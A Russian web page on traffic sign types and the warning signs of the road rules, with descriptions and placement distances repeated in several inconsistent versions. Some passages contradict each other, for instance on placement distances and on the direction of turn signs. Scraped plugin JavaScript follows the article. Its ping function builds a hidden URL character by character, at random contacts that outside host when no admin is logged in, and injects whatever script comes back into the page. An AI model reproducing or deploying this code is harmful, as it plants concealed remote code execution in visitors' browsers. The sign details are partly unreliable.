Предупреждающие знаки дорожного движения картинки с пояснениями

Типы дорожных знаков

Содержание

Дорожные знаки различаются по форме и цвету. Так можно отличить их тип. В каждую группу входят знаки, схожие по смыслу.

Всего существует 8 типов дорожных знаков:

  • запрещающие;
  • предупреждающие;
  • знаки приоритета;
  • предписывающие;
  • особые предписания;
  • информационные;
  • сервисные;
  • с дополнительной информацией.

Разберем, чем одни отличаются от других, и какие знаки входят в каждую группу.

Запрещающие

Как понятно из названия группы, знаки запрещают водителю совершить какое-либо действие: проехать, повернуть, обогнать, разогнаться, остановиться. Все запрещающие знаки имеют круглую форму.

Штрафы за каждый из знаков назначаются различные, в зависимости от ситуации. Например, въезд под «кирпич» на закрытую территорию карается штрафом 1 тыс. рублей за нарушение предписания знака. А за проезд под «кирпич» на встречную полосу движения уже отнимут права на 2-4 года.

Игнорировать запрещающие знаки могут автомобили, включившие спецсигналы и проблесковые маячки. Действия знаков заканчиваются у ближайшего перекрестка или у знаков, отменяющих ранее введенные ограничения.

Предупреждающие

Знаки предупреждения делают треугольной формы белого цвета с красным кантом. Исключение из этого правила составляют только знаки, предвещающие железнодорожный переезд и направление поворота.

Требования предупреждающих знаков невозможно нарушить, потому что они ничего не запрещают. Задача этих знаков – предупредить водителя о приближающейся опасности. Например, о сужении дороги впереди, возможности выхода на дорогу животных, скользкой дороге и об опасных поворотах.

Такие знаки устанавливают в 50-300 м от опасности в зависимости от того, где она находится – в городе или на трассе.

Знаки приоритета

Эти дорожные знаки объясняют, кто первым должен проехать пересечение дорог или другой сложный участок дороги. За нарушение такого знака на перекрестках штрафуют на 1000–1500 рублей.

Знаки, объясняющие приоритет, выполнены в разных формах и цветах. Они не подчиняются общему правилу типирования. Например, указатель с главной дорогой выполнен в виде желтого ромба с белым кантом, а знак «Уступить дорогу» – перевернутый белый треугольник с красной окантовкой.

Также к знакам приоритета относят таблички, предупреждающие водителя о приближении к перекрестку со второстепенной дорогой, указатели, регулирующие преимущество проезда узкого пути, и т. д.

Предписывающие знаки

Как правило, предписывающие указатели выполнены в форме круга. Пиктограммы чаще всего изображены на темно-синем фоне. Они разрешают движение: «стрелки» перед пересечением дорог, указатель, извещающий о въезде на круговое движение, таблички, обозначающие пешеходные или велодорожки.

Предписывающие знаки не накладывают ограничений, а наоборот, требуют выполнения конкретного маневра: показывают направление, скорость и вид транспорта, который может продолжить движение.

Знаки особых предписаний

Маркеры с особыми предписаниями сочетают в себе сразу несколько типов знаков – информационные и разрешенные. Указатели с пешеходным переходом демонстрируют, в каком месте пешеходам можно перейти дорогу, а водителям – где нужно сбросить скорость и быть особо внимательным. К этой же категории относятся знаки о выезде на автомагистраль, зоны только для общественного транспорта и мест их остановок.

Все знаки имеют квадратную или прямоугольную форму, могут быть синего цвета (стрелки, реверсивное или одностороннее движение), зеленого (въезд на автомагистраль) и белого (особые зоны с ограничениями).

Информационные знаки

К информационным указателям относят синие квадраты с указанием разрешенного разворота, знак парковки, подземные пешеходные переходы, таблички с указанием тупиков, схемы движения и т. д. Кроме того, это еще и знаки с названием городов, деревень и улиц. В городах они выполнены черными буквами на белом фоне, на трассах – белыми буквами на синем, а на скоростных дорогах – белым на зеленом.

Сервисные знаки

Маркеры сервиса показывают, где находится ближайшие СТО, АЗС или зона отдыха. В черте города их устанавливают непосредственно рядом с объектом, а на трассах – от 400 м до нескольких десятков километров. Также есть указатели, обозначающие автозаправочные станции с розетками для электрокаров.

Знаки с дополнительной информацией

Табличками с допинформацией называются прямоугольные небольшие белые маркеры, которые устанавливаются в дополнение к основному знаку. Например, табличка «только для служебных а/м» или способ установки транспортного средства вместе со знаком парковки. Они служат для уточнения знака, вместе с которым установлены. Типов нарушений за несоблюдение таблички не предусмотрено, то есть штраф будет выписываться за несоответствие требований основного знака. Однако стоит иметь в виду, что в некоторых регионах сотрудники ГИБДД эвакуируют автомобили с парковок, если те припаркованы в нарушении дополнительной таблички.

Напоминаем, что информация о наличии штрафов сохраняется в истории автомобиля. И если вы соберетесь продавать свой автомобиль, будущий владелец, проверивший историю через онлайн-сервис, может отказаться от покупки. Пусть у вас не возникает ситуаций с лишением прав. Желаем удачи на дорогах!

1. Предупреждающие знаки

Предупреждающие знаки информируют водителей о приближении к опасному участку дороги, движение по которому требует принятия мер, соответствующих обстановке.

1.1. «Железнодорожный переезд со шлагбаумом»

1.2. «Железнодорожный переезд без шлагбаума»

1.3.1. «Однопутная железная дорога»

Обозначение необорудованного шлагбаумом переезда через железную дорогу с одним путем.

1.3.2. «Многопутная железная дорога»

Обозначение необорудованного шлагбаумом переезда через железную дорогу с двумя путями и более.

1.4.1.-1.4.6. «Приближение к железнодорожному переезду»

Дополнительное предупреждение о приближении к железнодорожному переезду вне населенных пунктов

1.5. «Пересечение с трамвайной линией»

1.6. «Пересечение равнозначных дорог»

1.7. «Пересечение с круговым движением»

1.8. «Светофорное регулирование»

Перекресток, пешеходный переход или участок дороги, движение на котором регулируется светофором.

1.9. «Разводной мост»

Разводной мост или паромная переправа.

1.10. «Выезд на набережную»

Выезд на набережную или берег.

1.11.1. «Опасный поворот»

Закругление дороги малого радиуса или с ограниченной видимостью направо.

1.11.2. «Опасный поворот»

Закругление дороги малого радиуса или с ограниченной видимостью налево.

1.12.1. «Опасные повороты»

Участок дороги с опасными поворотами, с первым поворотом направо.

1.12.2. «Опасные повороты»

Участок дороги с опасными поворотами, с первым поворотом налево.

1.13. «Крутой спуск»

1.14. «Крутой подъем»

1.15. «Скользкая дорога»

Участок дороги с повышенной скользкостью проезжей части.

1.16. «Неровная дорога»

Участок дороги, имеющий неровности на проезжей части (волнистость, выбоины, неплавные сопряжения с мостами и тому подобное).

1.17. «Исскуственная неровность»

Участок дороги с искусственной неровностью (неровностями) для принудительного снижения скорости.

1.18. «Выброс гравия»

Участок дороги, на котором возможен выброс гравия, щебня и тому подобного из-под колес транспортных средств.

1.19. «Опасная обочина»

Участок дороги, на котором съезд на обочину опасен.

1.20.1. «Сужение дороги»

1.20.2. «Сужение дороги»

1.20.3. «Сужение дороги»

1.21. «Двустороннее движение»

Начало участка дороги (проезжей части) с встречным движением.

1.22. «Пешеходный переход»

Пешеходный переход, обозначенный знаками 5.19.1, 5.19.2 и (или) разметкой 1.14.1—1.14.2.

Участок дороги вблизи детского учреждения (школы, оздоровительного лагеря и тому подобного), на проезжей части которого возможно появление детей.

1.24. «Пересечение с велосипедной дорожкой или велопешеходной дорожкой»

1.25. «Дорожные работы»

1.26. «Перегон скота»

1.27. «Дикие животные»

1.28. «Падение камней»

Участок дороги, на котором возможны обвалы, оползни, падение камней.

1.29. «Боковой ветер»

1.30. «Низколетящие самолеты»

Тоннель, в котором отсутствует искусственное освещение, или тоннель, видимость въездного портала которого ограничена.

Участок дороги, на котором образовался затор.

1.33. «Прочие опасности»

Участок дороги, на котором имеются опасности, не предусмотренные другими предупреждающими знаками.

1.34.1.-1.34.2. «Направление поворота»

Направление движения на закруглении дороги малого радиуса с ограниченной видимостью. Направление объезда ремонтируемого участка дороги.

1.34.3. «Направление поворота»

Направления движения на Т-образном перекрестке или разветвлении дорог. Направления объезда ремонтируемого участка дороги.

1.35. «Участок перекрестка»

Обозначение приближения к перекрестку, участок которого обозначен разметкой 1.26 и на который запрещается выезжать, если впереди по пути следования образовался затор, который вынудит водителя остановиться, создав препятствие для движения транспортных средств в поперечном направлении, за исключением поворота направо или налево в случаях, установленных настоящими Правилами.

Предупреждающие знаки 1.1, 1.2, 1.5—1.33 вне населенных пунктов устанавливаются на расстоянии 150—300 м, в населенных пунктах на расстоянии 50—100 м до начала опасного участка. При необходимости знаки могут устанавливаться и на ином расстоянии, которое в этом случае указывается на табличке 8.1.1.

Знаки 1.13 и 1.14 могут устанавливаться без таблички 8.1.1 непосредственно перед началом спуска или подъема, если спуски и подъемы следуют друг за другом.

Знак 1.25 при проведении краткосрочных работ на проезжей части может устанавливаться без таблички 8.1.1 на расстоянии 10—15 м до места проведения работ.

Знак 1.32 применяется в качестве временного или в знаках с изменяемым изображением перед перекрестком, откуда возможен объезд участка дороги, на котором образовался затор.

Знак 1.35 устанавливается на границе перекрестка. В случае если на сложных перекрестках невозможно установить дорожный знак на границе перекрестка, его устанавливают на расстоянии не более 30 метров до границы перекрестка.

Вне населенных пунктов знаки 1.1, 1.2, 1.9, 1.10, 1.23 и 1.25 повторяются. Второй знак устанавливается на расстоянии не менее 50 м до начала опасного участка. Знаки 1.23 и 1.25 повторяются и в населенных пунктах непосредственно в начале опасного участка.

Часть 1. Предупреждающие знаки.

В данной части мы рассмотрим полное описание предупреждающих знаков.

«Железнодорожный переезд со шлагбаумом»

Знак устанавливают у железнодорожного переезда оборудованным шлагбаумом.

«Железнодорожный переезд без шлагбаума»

Знак устанавливают у железнодорожного переезда не оборудованным шлагбаумом.

Внимание. будьте внимательны при пересечение данного переезда, убедитесь в отсутствие приближающегося поезда.

«Однопутная
железная дорога»

Знак устанавливают у железнодорожного переезда, где проезжую часть пересекает только один путь

«Многопутная
железная дорога»

Знак устанавливают у железнодорожного переезда,где проезжую часть пересекает два и более путей

«Приближение к железнодорожному переезду»

Знак устанавливают за 150 метров до железнодорожного переезда

«Приближение к железнодорожному переезду»

Знак устанавливают за 100 метров до железнодорожного переезда

«Приближение к железнодорожному переезду»

Знак устанавливают за 50 метров до железнодорожного переезда

«Пересечение с трамвайной линией»

«Пересечение равнозначных дорог»

Знак предупреждает Вас о том, что впереди равнозначный перекресток

Внимание. На перекрестке действует правило «Правой руки» т.е. необходимо уступить дорогу транспортному средству находящемуся справа от Вас.

«Пересечение с круговым движением»

Знак предупреждает Вас о том, что впереди организованно круговое движение.

Внимание. как правило круговое движение имеет преимущество.

«Светофорное регулирование»

Знак предупреждает Вас о том, что перекресток или пешеходный переход регулирует светофор.

«Разводной мост»

Знак предупреждает Вас о том, что впереди разводной мост или паром.

«Выезд на набережную»

Знак предупреждает Вас о том, что впереди выезд на набережную или берег.

«Опасный поворот направо»

Знак предупреждает Вас о том, что впереди опасный поворот направо. Данный знак устанавливают вне населенном пункте за 150 — 300 метров. А в населенном пункте за 50 -100 метров.

«Опасный поворот налево»

Знак предупреждает Вас о том, что в переди опасный поворот налево. Данный знак устанавливают вне населенном пункте за 150 — 300 метров. А в населенном пункте за 50 -100 метров.

«Опасный поворот с первым поворотом направо»

Знак предупреждает Вас о том, что впереди опасный поворот направо. Данный знак устанавливают вне населенном пункте за 150 — 300 метров. А в населенном пункте за 50 -100 метров.

«Опасный поворот с первым поворотом налево»

Знак предупреждает Вас о том, что впереди опасный поворот налево. Данный знак устанавливают вне населенном пункте за 150 — 300 метров. А в населенном пункте за 50 -100 метров.

«Крутой спуск»

Знак предупреждает Вас о крутом спуске.

Внимание. При затруднительном разъезде транспортных средств, транспортное средство едущее на подъем имеет преимущество, следовательно, в зоне действия этого знака Вы обязаны уступить дорогу тем кто следует на подъем.

«Крутой подъем»

Знак предупреждает Вас о крутом подъеме. Внимание. При затруднительном разъезде транспортных средства следующие на подъем имеют преимущество, по отношению к тем кто следует на спуск.

«Скользкая дорога»

Знак предупреждает Вас о том, что на дорожном покрытие может быть лед либо гололедица. Как правило такие знаки ставят у моста.

«Неровная дорога»

Знак предупреждает Вас о том, что дорога имеет неровности ямы, выбоины, не плавное сопряжение у дорожного покрытия моста.

«Искусственная неровность»

Знак предупреждает Вас о том, что на проезжей части, для снижения скоростиустановлена- (ы) неровность -(и) (лежачий полицейский)

«Выброс гравия»

Знак предупреждает Вас о том, что из-под колес транспортных средств возможен выброс гравия, щебня и тд.

«Опасная обочина»

Знак предупреждает Вас о том, что съезд на обочину опасен.

«Сужение дороги с обеих сторон»

Знак предупреждает Вас о том, что впереди сужение дороги с обеих сторон, следовательно необходимо перестроиться из крайних полос движения, ближе к центру проезжей части. При этом Вам необходимо уступить дорогу транспортным средствам, которые движутся по полосе на которую Вы собираетесь въезжать.

«Сужение дороги справа»

«Сужение дороги слева»

Знак предупреждает Вас о том, что впереди сужение дороги слева, следовательно необходимо перестроиться из крайней левой полосы, вплоть до крайней правой.

При этом Вам необходимо уступить дорогу транспортным средствам, которые движутся по полосе на которую Вы собираетесь въезжать.

«Двустороннее движение»

Знак предупреждает Вас о том, что скоро начнется двустороннее движение.

Внимание. Как правило, такой знак устанавливают в конце одностороннего движения, а следовательно разворот запрещен.

«Пешеходный переход»

Знак предупреждает Вас о том, что возможно появление пешехода на проезжей части.

«Дети»

Знак предупреждает Вас о том, что возможно появление детей на проезжей части. Как правило такой знак устанавливают около детский учреждений

«Пересечение с велосипедной дорожкой»

Знак предупреждает Вас о том, что возможно появление велосипедиста на проезжей части.

«Дорожные работы»

Знак предупреждает Вас о том, что возможно появление рабочих, спец. техники, ям, выбоин и тд. на проезжей части.

«Перегон скота»

Знак предупреждает Вас о том, что возможно появление домашнего скота на проезжей части.

«Дикие животные»

Знак предупреждает Вас о том, что возможно появление диких животных на проезжей части.

«Падение камней»

Знак предупреждает Вас о том, что возможны падение камней, оползни, обвалы на проезжей части.

«Боковой ветер»

Знак предупреждает Вас о сильном боковом ветре.

Внимание. Если вы выезжаете из-за закрытого участка проезжей части, то в зоне действия этого знака, Вам необходимо снизить скорость и быть готовым к изменению траектории транспортного средства.

«Низколетящие самолеты»

Знак предупреждает Вас о том, что возможен сильный шум пролетающего низко самолета, знак устанавливается для того, что бы водитель не испугался внезапного шума.

«Тоннель»

Знак предупреждает Вас о том, что в тоннеле отсутствует искусственное освящение.

Внимание. До въезда в тоннель, Вам необходимо включить ближний свет фар.

«Затор»

Знак предупреждает Вас о том, что на участке в зоне действия этого знака возможно возникновения затора.

«Прочие опасности»

Знак предупреждает Вас, о иных опасностях не предусмотренными другими знаками.

«Направление поворота направо»

Знак предупреждает Вас, об очень крутом повороте налево

Будьте ОСТОРОЖНЫ, снизьте скорость до минимальной.

«Направление поворота налево»

Знак предупреждает Вас, об очень крутом повороте направо

Будьте ОСТОРОЖНЫ, снизьте скорость до минимальной.

«Направление поворота»

Этот знак как правило устанавливают на опасных «Т» образных перекрестках. Будьте внимательны.

Предупреждающие знаки дорожного движения

В настоящее время предупреждающие дорожные знаки достаточно часто есть возможность встретить на автомобильных трассах.

Как можно судить по названию, это особые указатели, которые не призваны запретить то или иной действие, а также это не ограничивающие таблички.

Приоритетная их функция заключается в предупреждении участников движения на трассе о каком-то обстоятельстве или объекте на дороге.

Основные особенности предупреждающих знаков

Есть несколько основных особенностей, которые присущи указателями категории предупреждающих.

Данные знаки совершенно ничего не запрещают, потому невозможно нарушить их требования, даже в теории.

Соответственно штраф за нарушение требования того или иного предупреждающего знака получить нельзя.

Говоря об особенностях современных предупреждающих знаков, можно выделить некоторые их внешние характеристики.

Практически все предупреждающие указатели представляют собой треугольник, который имеет белую середину и стороны яркого красного цвета.

Предупреждающие знаки в картинках







Как производится установка предупреждающих знаков

Предупреждающие знаки, имеющие вид треугольника, устанавливаются строго на расстоянии минимум 150 и максимум 300 метров до начала того или иного, заслуживающего внимания участка, если установка производится в населенных пунктах.

На территории городов процесс осуществляется на расстоянии от 50 до 100 метров.

При наличии специальной таблички 8.1.1 разные треугольные знаки могут быть установлены и на ином расстоянии от начала опасной территории.

Также стоит отметить, что некоторые разновидности предупреждающих знаков должны в обязательном порядке дублироваться.

По той причине, что предупреждающие дорожные указатели говорят информируют водителя о приближении к какому-то определенному участку дороги, в процессе движения требуется принятия тех или иных действий, полностью соответствующих обстановке.

Указанные выше параметры по расстоянию установки могут колебаться в прямой зависимости от некоторых обстоятельств:

  • от общепринятой скорости передвижения;
  • от условий видимости;
  • от определенных технических возможностей.

Процесс установки, как правило, осуществляют профессионалы.

Это компании, оказывающие услуги по монтажу и последующему обслуживанию специальных технических приспособлений, которые изначально предназначены для обеспечения максимальной дорожной безопасности.

Специалисты подобных компаний осуществляют монтаж дорожных знаков в полном соответствии со всеми стандартами ГОСТа.

Стойки указателей монтируются посредством бетонирования в асфальт или грунт.

Стойки дорожных знаком, как правило, оснащаются особыми усилениями, которые серьезно увеличивают их стойкость даже при достаточно сильном ветре.

Выполнение всех подобных работ осуществляется исключительно по разрешению местного отделения автомобильной инспекции.

Подобные предупреждающие указатели монтируются на трассах с достаточно большим транспортным потоком, на улицах мегаполиса, а также на придомовых территориях.

Качественная работа по установке указателей такого плана благотворно сказывается на снижении общего количества аварийных ситуаций.

1. Предупреждающие знаки

Предупреждающие знаки информируют водителей о приближении к опасному участку дороги, движение по которому требует принятия мер, соответствующих обстановке.

** Нумерация дорожных знаков соответствует ГОСТу Р 52290-2004.

Обозначение необорудованного шлагбаумом переезда через железную дорогу: 1.3.1 — с одним путем, 1.3.2 — с двумя путями и более.

Дополнительное предупреждение о приближении к железнодорожному переезду вне населенных пунктов.

Перекресток, пешеходный переход или участок дороги, движение на котором регулируется светофором.

Разводной мост или паромная переправа.

Выезд на набережную или берег.

Закругление дороги малого радиуса или с ограниченной видимостью: 1.11.1 — направо, 1.11.2 — налево.

Участок дороги с опасными поворотами: 1.12.1 — с первым поворотом направо, 1.12.2 — с первым поворотом налево.

Участок дороги с повышенной скользкостью проезжей части.

Участок дороги, имеющий неровности на проезжей части (волнистость, выбоины, неплавные сопряжения с мостами и тому подобное).

Участок дороги с искусственной неровностью (неровностями) для принудительного снижения скорости.

Участок дороги, на котором возможен выброс гравия, щебня и тому подобного из-под колес транспортных средств.

Участок дороги, на котором съезд на обочину опасен.

Сужение с обеих сторон — 1.20.1 , справа — 1.20.2 , слева — 1.20.3 .

Начало участка дороги (проезжей части) с встречным движением.

Пешеходный переход, обозначенный знаками 5.19.1 , 5.19.2 и (или) разметкой 1.14.1 и 1.14.2 .

Участок дороги вблизи детского учреждения (школы, оздоровительного лагеря и тому подобного), на проезжей части которого возможно появление детей.

Участок дороги, на котором возможны обвалы, оползни, падение камней.

Тоннель, в котором отсутствует искусственное освещение, или тоннель, видимость въездного портала которого ограничена.

Участок дороги, на котором образовался затор.

Участок дороги, на котором имеются опасности, не предусмотренные другими предупреждающими знаками.

Направление движения на закруглении дороги малого радиуса с ограниченной видимостью. Направление объезда ремонтируемого участка дороги.

Направления движения на Т-образном перекрестке или разветвлении дорог. Направления объезда ремонтируемого участка дороги.

Обозначение приближения к перекрестку, участок которого обозначен разметкой 1.26 и на который запрещается выезжать, если впереди по пути следования образовался затор, который вынудит водителя остановиться, создав препятствие для движения транспортных средств в поперечном направлении, за исключением поворота направо или налево в случаях, установленных настоящими Правилами.

Предупреждающие знаки 1.1 , 1.2 , 1.5 — 1.33 вне населенных пунктов устанавливаются на расстоянии 150 — 300 м, в населенных пунктах — на расстоянии 50 — 100 м до начала опасного участка. При необходимости знаки могут устанавливаться и на ином расстоянии, которое в этом случае указывается на табличке 8.1.1 .

Знаки 1.13 и 1.14 могут устанавливаться без таблички 8.1.1 непосредственно перед началом спуска или подъема, если спуски и подъемы следуют друг за другом.

Знак 1.25 при проведении краткосрочных работ на проезжей части может устанавливаться без таблички 8.1.1 на расстоянии 10 — 15 м до места проведения работ.

Знак 1.32 применяется в качестве временного или в знаках с изменяемым изображением перед перекрестком, откуда возможен объезд участка дороги, на котором образовался затор.

Знак 1.35 устанавливается на границе перекрестка. В случае если на сложных перекрестках невозможно установить дорожный знак на границе перекрестка, его устанавливают на расстоянии не более 30 метров до границы перекрестка.

Вне населенных пунктов знаки 1.1 , 1.2 , 1.9 , 1.10 , 1.23 и 1.25 повторяются. Второй знак устанавливается на расстоянии не менее 50 м до начала опасного участка. Знаки 1.23 и 1.25 повторяются и в населенных пунктах непосредственно в начале опасного участка.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}